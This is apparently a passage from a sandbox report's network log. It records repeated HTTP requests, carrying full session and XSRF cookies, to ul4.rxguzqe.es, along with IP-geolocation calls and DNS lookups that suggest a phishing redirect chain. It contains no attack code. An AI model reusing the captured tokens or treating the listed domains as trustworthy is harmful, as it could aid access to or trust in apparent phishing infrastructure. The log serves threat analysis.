laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /oprpEAko9tHLgIl4pNQ5v6t65JWPhpM8p2fAE85ghFz15eTxBleA3WokCMhY9BeQpblOE4ef200 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /mnhGeASw0P7e2SRJqeklVOTtKyDrA2ULcwo8dpGkV90145 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /gh0Z8CdjCjf952KbopsjrvIOmn2ciNEvY1ntRBglqi12202 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /mn7RjdpKvbcWXIn9jsM7gS7A06HnJp4XAm5uKaTw56hUFbJjE4u7m6fx8mnStxyiuHOfaa6uv220 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /qrNGbOgmXfWdyVGMUujHOFW1S12GJs4V6u6v0wjVkpoavb42cG7ef233 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /kltjWfU0lKC39xDyak2Gelrfz3gf5NrRgoFiAXdws4vs4tvopcIZjtSdmuJsyZb7UZoPJDcbE4Jyz227 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /uvDuRymmAKKlHrNxVjezMlXrzcg45ZLsxjbqjNBRMqAv0k9Sref252 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ul4.rxguzqe.es/OUAAABZBWRBGBZQAWIGOTYZELhzppkvhdtdz9agbafeg9ajk0s0kc5d?LLYDWPXUGSNULOYGCSHPHMWXHQWDJAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ij09BSrCOT3cmMjwG8oOvyhc8gVb8ESF6mkcdJUQ5rTrMaMAEd5FVqxgDNq56170 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /yz9RwwiMcKxpChoIkhs5q7X0QtmnUFDD6mIlTg0P5M496VwGoab179 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /oprpEAko9tHLgIl4pNQ5v6t65JWPhpM8p2fAE85ghFz15eTxBleA3WokCMhY9BeQpblOE4ef200 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /qrNGbOgmXfWdyVGMUujHOFW1S12GJs4V6u6v0wjVkpoavb42cG7ef233 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /gh0Z8CdjCjf952KbopsjrvIOmn2ciNEvY1ntRBglqi12202 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /uvDuRymmAKKlHrNxVjezMlXrzcg45ZLsxjbqjNBRMqAv0k9Sref252 HTTP/1.1Host: ul4.rxguzqe.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkthSEdpT3VUV0hZNE5xekhzYThzZnc9PSIsInZhbHVlIjoidDJQbWNqUDZsM290RjBoUXl3V09NQUhrMVNheUJoMnNFemVpVFZqa0h2aUt4MnFqNms0SjdRRlpwTm1QQk9IWnMrbVBabmUyVWlQRmt1anNIVmtRdGZVcndQUTZSeS9Yd1JIdUpzbTkyVkhyWCtraDhRRmd3cjdCZ3YvM1NpSFoiLCJtYWMiOiI5MWM1MzMwMTM0MmJiZDVlY2M5ZTAzMjc3YmU5NzY5MzYzN2NiZGMwMjA1ODJlMmY4YjY0NWQ1MGU5YjYzNGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhWV1hVMTc4MHBBbW9Ybk8xUU9Ta3c9PSIsInZhbHVlIjoiRkd1TFhxM0lMSVlua3d0dktxclRzQS9NY3dQN045RDd3QldSRmlDUU0xK3EzWWV2K3NHaEFzVWFpOE9WTG5FUTdQSk1MZ3FCU2U4enpmblUrRG9rZWlqYVZ4V2wvbStnM2J1T081bUhqaXA0WFMyMzR6M0FVVjlhdjMyZmYyRkwiLCJtYWMiOiI4YjdmOTJmNmIyNWUwYzE3MTcxMWQ3YTM3NGE1NTUzYTU4M2FhNDQwMzliOTc0MjY1Y2VjMmYyMzA2MjliMGU1IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://ul4.rxguzqe.esSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ul4.rxguzqe.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /OlJFezirepOKvRlCjnFSDYLEZXlUCODEIERKXHLSMQBOUEJVSKONDQCRMGFBHKDHIHBLSZVpqbg06xvoo2yzJWKtuv40 HTTP/1.1Host: wkvobqmz1nlx3y95jroh8g2z0rra9wbwvxxeztkc3csozvswko3mgf6g.wnzmrp.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic	DNS traffic detected: DNS query: can01.safelinks.protection.outlook.com
Source: global traffic	DNS traffic detected: DNS query: m.exactag.com
Source: global traffic	DNS traffic detected: DNS query: towsila.com
Source: global traffic	DNS traffic detected: DNS query: ul4.rxguzqe.es
